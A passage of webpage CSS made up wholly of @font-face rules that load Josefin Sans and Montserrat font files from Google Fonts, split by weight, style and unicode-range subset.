url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, 